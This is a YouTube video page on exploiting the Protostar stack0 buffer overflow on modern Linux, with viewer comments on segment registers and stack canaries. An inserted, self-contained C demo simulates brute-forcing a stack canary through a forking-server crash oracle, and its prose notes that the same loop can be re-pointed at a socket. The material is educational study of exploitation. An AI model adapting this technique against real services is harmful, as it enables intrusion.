Buffer overflow on a modern system impossible? stack0: part 1 - bin 0x21

  • Published on 6 Jul 2017
  • We have a look at stack level 0 from exploit-exercises.com/Protostar and compile it on a current Ubuntu, to see if it's still exploitable.
    stack0: liveoverflow.com/binary_hacki...
    #BinaryExploitation #BufferOverflow

Comments • 80

  • @HonoraryBoT · 7 years ago · +127

    About that FS register.
    Segment registers are used to form a linear address from a virtual one. A virtual address is the full form of addressing, which goes like seg:offset (10:6455, cs:rip). There are six segment registers: cs - code segment, ds - data segment, ss - stack segment, and three additional ones, es, fs, gs. The default data segment is ds, but it can be overridden with an opcode prefix to es, fs or gs. Also, the processor fetches instructions not just from rip, but from cs:rip. Same for the stack: it's not rsp, it's ss:rsp.
    Those segment registers hold a selector into the global or local descriptor table. Along with the other segment attributes (like the current ring), they specify a base and a limit of that segment. Which means you can specify ds to start from linear address 0x10000 and have a limit of 0xffff, so that ds:123 points to linear memory at 0x10123, and you can access up to ds:ffff.
    This allows segmenting a program within a single virtual address space.
    Modern operating systems don't care about segmentation and use paging for address space separation. So cs, ds, ss describe segments which start at 0 and have a limit of 4 GB - that's the full 2^32 addresses on x86. On x64, segmentation doesn't care about base and limit at all.
    But! You have a per-thread structure - a stack; in hardware it is implemented using the rsp register, right? But what if we need another "more constant" structure for a thread? OSes used TLS or the TEB as a separate segment - fs. Its base is selected by the kernel when a thread is created. So every thread can execute something like mov fs:[0] and be sure that it is pointing to its private data. x64 even reserved the fs and gs registers to be treated specially - they have a non-zero base, so that OSes could implement their TLS.
    Why exactly fs? Well, ds is the default for data fetches, es is reserved for string ops like 'stosb', which should have the same base as ds to operate as we expect. So the next spare segment register is fs. As simple as that. gs may also be used; in fact it is used for the x64 TEB on x64 Windows, while fs is used for the 32-bit TEB for compatibility reasons.

    • @biehdc · 7 years ago · +3

      makes sense, pin this?

    • @xcy0n · 6 years ago · +1

      HonoraryBoT THANK YOU! Never found a good explanation..

    • @Zooiest · 5 years ago · +2

      Uhh WHAT?

    • @Calm_Energy · 5 years ago

      So does that mean if we see fs in the assembly code the compiler is working on a 32-bit system? Thanks for the explanation, it was very helpful!

    • @typedeaf · 5 years ago · +1

      @Calm_Energy No. It in no way implies 32-bit code.

  • @mattymooo100 · 4 years ago · +10

    It took a lot to get my head around assembly, but now I understand it, it's so easy (within reason)!

    • @peesicle · 2 years ago · +2

      how

  • @hacktheplanet1837 · 7 years ago · +3

    Your videos are such high quality. Thank you for taking the time to discuss topics thoroughly. I look forward to understanding binary exploitation, thanks to all you've done!

  • @targz5690 · 7 years ago · +20

    I've been following you for months, and I'm finally making a comment.
    This is definitely the BEST stuff I've ever seen.
    Thank you so much!

  • @otkchk · 7 years ago · +8

    Damn. A whole video answering the question I asked a couple of months ago on another of your videos.

    • @HerrMustermann · 7 years ago · +3

      Alex Tkachuk same. This guy is awesome. LiveOverflow just became StackOverflow

    • @MahNameIsJeff · 7 years ago · +2

      Well. If we add a bit... i mean a HUGE EGO and a lot of trash talking then it can be close to Stackoverflow. He doesn't have either or at least doesn't show it in vids. He is better than Stackoverflow.

  • @kakkaaa36 · 7 years ago

    Segment registers are used to hold segment selectors, which contain the index that must be used to access the GDT to find the segment information. Three of these registers are special-purpose registers: cs, ss and ds (respectively code segment, stack segment and data segment for the current process). The cs register also has the information about the current privilege level. For each of these registers, there is an associated non-programmable register that holds the segment descriptor to avoid the access to the GDT. That offset is summed to the base address of the segment retrieved from the segment descriptor (an entry of the GDT). If I made some errors in English, I'm sorry.

  • @agnelaaron1728 · 5 years ago · +1

    My professor told me segment registers store indexes of entries in the global descriptor table, and the highest 13 bits are the segment selector and the last 3 bits are the CPL.

  • @retfede · 7 years ago

    Great video as always! I have so many questions... I might "borrow" your video and talk over it with my questions and where I got confused, and see if any charitable soul takes pity on my stupidity and helps me out lol.
    Of course first I'll have to try it out for myself.
    Keep these videos coming, you're doing a great job bro 👍

    • @LiveOverflow · 7 years ago

      what do you mean with "borrow"?

    • @retfede · 7 years ago

      Download and record myself watching it and asking question over it to then upload it and see if you or anyone who watches it can help me out solve my questions. Of course if you don't mind, hope it's ok with you 😇

  • @wbuchmueller · 7 years ago · +1

    How about ROP as bin 0x22? Would be the next step in exploitation, methinks.
    Great video, really fascinating stuff.
    Also I am amazed that we're only talking about bypassing the stack canary here; bypassing ASLR is a whole new world of suffering.

  • @konstantinrebrov675 · 5 years ago · +1

    Segment registers: In the old days, when computers had segmented memory, these registers would point to various memory segments. CS pointed to the code segment, DS the data segment, SS the stack segment. ES, FS, and GS are just extra general-purpose registers. Modern computers don't use segmented memory any more, so these registers are nowadays used for paging information, threading information, and other information. Modern computers use flat memory instead of segmented memory. We no longer have DS, ES, or SS in x64! CS, FS, and GS are still here! This is because all modern 64-bit computers use the flat memory model.

  • @xdsquare · 6 years ago

    Really extremely interesting channel, discovered far too late.

  • @rudrakshkashyap7467 · 4 years ago · +1

    2:53 I tried to reorder the variables, but it does affect the assembler code, and I also noticed that when the program ends with exit(0) instead of return 0, the program doesn't check the stack cookie (whether it changed or not) at the end, though it declares it at the start.

  • @HerrMustermann · 7 years ago · +27

    You are the only person I'm afraid will stop making videos, because you can't be replaced ^^
    It took far too long to find you.

    • @LiveOverflow · 7 years ago · +3

      +Max Mustermann thanks

  • @funwithandroid4558 · 7 years ago · +8

    Recommended reading related to this video: www.elttam.com.au/blog/playing-with-canaries/
    It explains thoroughly stack canaries on modern Linux and how it can be played with :)
    And probably the most comprehensive intro to x86 segmentation: duartes.org/gustavo/blog/post/memory-translation-and-segmentation/

  • @ThatE46 · 5 years ago

    Explained very well. Do you mind telling me what kind of experience you have? Throughout your life, possibly? Nothing personal, I just want to get an idea. I've been watching more of your videos and I find myself spending a lot of time doing so.

  • @l3n693 · 7 years ago · +2

    That intro and outro sound was made by you? If yes then good job! It's really cool and somehow matches the content of the series :P

    • @LiveOverflow · 7 years ago · +1

      +AdvSpyL3n nah, it's royalty-free YouTube music :)

    • @l3n693 · 7 years ago

      EDIT: Ohh yea! Found in a reddit post "The End is Near - Gunnar Olsen", it's so cool :O

  • @epicm999 · 2 years ago

    Yep, it's time to learn assembly.

  • @skrmnghrd4520 · 4 years ago · +1

    You know a good teacher when he admits that he doesn't fully understand a subject instead of pretending he knows. Anyway, I still wish I had 10% of your knowledge 😞

  • @romanemul1 · 7 years ago

    you have interesting videos

  • @rautamiekka · 5 years ago

    64-bit is very hard against any issue, so besides the bruteforcing part it might not even be possible.

  • @muhaahaloa941 · 7 years ago

    Woooop Wooooop, nice, but I would like to see CFG and other Windows protections. But enjoyed
    the video, brings back good memories..

    • @LiveOverflow · 7 years ago · +1

      unfortunately I have no clue about windows :S

  • @jmtechm0459 · 5 years ago

    I don't understand how the integer at ebp-54 is before the buffer at ebp-50 on the stack? In this case isn't it after? The stack grows downward, right?

  • @DasCapschen · 5 years ago

    If it is initially reading the stack cookie from "fs:0x28", why do we have to guess it later? Can we not just read it from there again? Or will that create a new, random stack cookie?
    I tried checking what it does, but if I try to access fs:0x28 (checked it's the same on my system by disassembling something first), I can't get it to compile, or it segfaults when it gets there :/
    (not much experience with assembly language though :p)

  • @Philbertsroom · 7 years ago · +1

    Wouldn't it make more sense if each buffer had a 'cookie' at the end and they were all compared?

  • @AshutoshBaghel · 5 years ago · +1

    Can you make a vid on page tables / virtual memory?

  • @bluesdog88 · 4 years ago · +1

    Mate, is it possible to code something like this with a GUI for remote access attacks? Looking to code something to put in my GIT, probably way beyond my skills but we have to aim for something ;)

  • @thecrazzxz3383 · 3 years ago

    Modern problems require modern solutions

  • @vanessasdfsdf5415 · 7 years ago · +4

    Nice video! Can you do more things like web security?

  • @WorldandWarfare · 7 years ago

    This may be a dumb question, but do you guys think the attack surface for penetration testers is getting smaller as time passes? It seems like there are so many different kinds of protections in place these days that it just keeps getting harder and harder

    • @HerrMustermann · 7 years ago · +2

      WorldandWarfare no. Since new technology is being created in great amounts the attack surface increases rapidly. You could ask the same question with malware itself. There are sooo many protection mechanisms against it and way too many big companies focusing on anti virus systems but still, not a single security researcher in the world would (probably ever) say that they beat malware and that there are no security researchers needed.
      Also, if you are scared that you won't find any good jobs in that field since they are "not needed anymore" you can relax. There is so much new technology to secure that I would say that it's more likely that a world war will destroy all our technology before we got a chance to protect half of it.

  • @riteshdewan1361 · 3 months ago

    An Ode To C / C++ Thread SAFETY
    Static constants abound in the lexical analyzer and compiler. Dynamic linking libraries deploy a plethora of data structures like trees and maps. The linker if static won't undergo modifications by system calls in the appended files at runtime. The loader generates the machine codecs always dynamic in binaries or hexadecimals. The compile time could be automatic or register prompting change in the volatile memory. That makes for thread safe in mutex or deadlock address locations. Any programming languages that are reporting segmentation fault or overflow and overrun are unsafe and need be pontificated for the perverse logic. It could make the operating system crash and the semaphore would rather be rectified to reinstate the infinite loop.

  • @amcsi · 6 years ago

    To be clear, you could just debug the application to see what cookie value is being matched against? So this buffer overflow stuff is just for fun, but far less effective than just debugging.

    • @MKkniGEAR · 6 years ago · +1

      You don't always have access to debugging information. Sometimes all you have is input and output, like when you're connected to a server application and don't even have local access to the machine. Also, when you run a program through a debugger the environment is changed; I had a problem one day with a challenge where I got access to a shell in gdb but didn't have the rights to read the flag as I should have (I don't know if that's gdb doing that, or some kind of security put up by the admins or in Linux) and I don't know how to bypass this (still a newbie).
      Anyway: having an exploit work only when debugging makes it really suck, as it will work only with local access to the machine + debugging information available.

  • @protreo · 7 years ago · +1

    I watched one of Gynvael's vids, and want to ask if a time-based brute force of the cookie byte by byte is possible on x64, or will it be too fast to record? Like, if you guess the first byte, you try to check the second byte, which means that execution of the process is longer, which means you probably guessed the first byte right?

    • @LiveOverflow · 7 years ago · +2

      I don't think that it's a notable difference, as it's a simple cmp instruction. Also, after it crashes the process is gone, and on the next execution the cookie will be different.
      BUT there are instances of forking servers where a crash doesn't change the cookie, because only one child dies, and then you can bruteforce it. If a child doesn't crash, the value was correct.
      Read this, section "3.3 - Exploiting canaries remotely" - phrack.org/issues/67/13.html

    • @jeffjerseycow2645 · 7 years ago · +3

      Also for anyone that's interested I wrote an exploit for a CTF a few months ago that uses this remote brute forcing to guess the security cookie, de-aslr the binary, de-aslr libc, de-aslr the stack, rop chains a call to mprotect and turns off dep before jumping to some shell code. It's all on x64 and I'll more than happily simplify it/explain it if anyone's interested.
      github.com/JeffJerseyCow/InsomniHack-CTF-2017
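An added example, not from the video, the Phrack article or either comment above, of the forking-server case LiveOverflow describes and that the linked CTF exploit relies on. A parent holds a constructed canary (its low byte is 0, matching what glibc and musl do on 64-bit), every forked child inherits that same value, and the only thing the attacker observes per attempt is whether the child crashed. Overwriting one more byte of the canary slot per attempt and keeping the byte that does not crash turns a 2^64 search into at most 8 × 256 children. The "server", the overflow and the crash oracle are all simulated inside one process here; against a real service the oracle would be the connection dropping when the child hits `__stack_chk_fail`.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define CANARY_BYTES 8

/* Constructed stand-in for the value the server read from fs:0x28 at start-up.
 * Low byte is 0 as glibc/musl zero it on 64-bit. Every forked child inherits
 * this exact value, which is what makes the byte-at-a-time attack possible. */
static const uint64_t server_canary = 0x5a3c7e91d4b2f600ULL;

/* The "vulnerable" child: `payload` overwrites the first `len` bytes of the
 * slot where the canary sits (a partial overflow), then the epilogue check
 * either passes (_exit(0)) or kills the child the way __stack_chk_fail would. */
static void child_handler(const uint8_t *payload, size_t len) {
    uint8_t slot[CANARY_BYTES];
    memcpy(slot, &server_canary, CANARY_BYTES);
    memcpy(slot, payload, len);                 /* the overflow reaches `len` bytes in */
    if (memcmp(slot, &server_canary, CANARY_BYTES) != 0) {
        struct rlimit no_core = {0, 0};
        setrlimit(RLIMIT_CORE, &no_core);       /* demo only: don't litter core files */
        abort();                                /* SIGABRT, like __stack_chk_fail */
    }
    _exit(0);
}

/* Crash oracle: fork one "connection", deliver the payload, report signal death. */
static int child_crashed(const uint8_t *payload, size_t len) {
    pid_t pid = fork();
    if (pid < 0) { perror("fork"); exit(1); }
    if (pid == 0) child_handler(payload, len);
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) { perror("waitpid"); exit(1); }
    return WIFSIGNALED(status);
}

/* Recover the canary one byte at a time: keep the bytes already known, try all
 * 256 values for the next one, and accept the first that does not crash.
 * Returns 1 on success with the value in *recovered and the fork count in *tries. */
int bruteforce_canary(uint64_t *recovered, int *tries) {
    uint8_t guess[CANARY_BYTES] = {0};
    *tries = 0;
    for (size_t i = 0; i < CANARY_BYTES; i++) {
        int found = 0;
        for (int b = 0; b < 256; b++) {
            guess[i] = (uint8_t)b;
            (*tries)++;
            if (!child_crashed(guess, i + 1)) { found = 1; break; }
        }
        if (!found) return 0;                    /* oracle inconsistent: give up */
    }
    memcpy(recovered, guess, CANARY_BYTES);      /* same byte order the child saw */
    return 1;
}

int main(void) {
    uint64_t canary = 0;
    int tries = 0;
    if (bruteforce_canary(&canary, &tries))
        printf("recovered canary %#018llx after %d forked children\n",
               (unsigned long long)canary, tries);
    return 0;
}
```

Because the low byte is zero, the first byte costs a single attempt; the remaining seven cost on average 128 each, so the whole canary falls in roughly a thousand connections rather than 2^64. The same loop, re-pointed at a socket and extended past the saved return address, is the first stage of the exploit linked in the reply above.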

  • @pitust · 5 years ago

    so if you have fs:[0x28] = fs*16 + 0x28

  • @typedeaf · 5 years ago

    Curious why you would randomize the cookie, if the cookie is already being randomized. Now you have two changing parts instead of one. Wouldn't you be better off keeping your cookie guess static?

  • @reversinglabs9455 · 7 years ago · +1

    cool bro

  • @firefart · 7 years ago

    How do you want to bruteforce the cookie? It changes on every run of the program, so it would only be exploitable if the main function forks into a new process. Or am I missing something?

    • @LiveOverflow · 7 years ago · +2

      +Christian Mehlmauer each run we have a chance of 1 in 16 million to guess the right cookie ;)

    • @firefart · 7 years ago · +1

      haha so let's start a live video of the bruteforcing and see how long it takes :D

  • @Facebook-sk2iy · 1 year ago

    Can the ASLR be exploited using the random exploit :)? Maybe it's a stupid question, but that's what comes to my mind right now.

  • @0x4hm3d0x · 6 months ago

    ... I searched your channel for Protostar videos... 😢 But found none.

  • @lonewolfcoding5208 · 2 years ago

    I'm a Node.js developer.
    I can't find authentication in Socket.IO using MySQL as session store.
    It will be vulnerable if someone tries to flood the memory of my server due to the lack of authentication.
    Please, someone help me.

  • @Momo-vy4xw · 6 years ago

    Can someone tell me what program he is using to graphically display the assembly code ?

    • @LiveOverflow · 6 years ago · +2

      You mean Binary Ninja?

    • @Momo-vy4xw · 6 years ago

      LiveOverflow yes it is thank you for the quick reply, keep on going the good work

  • @philippetrov4881 · 7 years ago

    Aren't those "cookies" called "canaries"?

    • @LiveOverflow · 7 years ago · +3

      +Philip Petrov same thing

  • @florianzimmermann2730 · 6 years ago

    Making mistakes really needs a programmer who ignores this; I'm ignoring such messages, but my code is most of the time only used by me.

  • @luisito7018 · 7 years ago

    oh .. you hooked me up
    I know it will end up building a ROP chain, but bypassing the cookie ...

  • @applenews9249 · 7 years ago

    But why 0xffffff in calculator?

    • @LiveOverflow · 7 years ago

      just to convert it to decimal

    • @applenews9249 · 7 years ago

      LiveOverflow thanks!

  • @theashmedai007 · 5 years ago

    buffer overflow attack outdated ???

  • @Scoopta · 6 years ago · +1

    Am I the only one who prefers AT&T syntax?

  • @fsquad8191 · 7 years ago

    lol , nice

  • @aamir4369 · 7 years ago · +2

    not first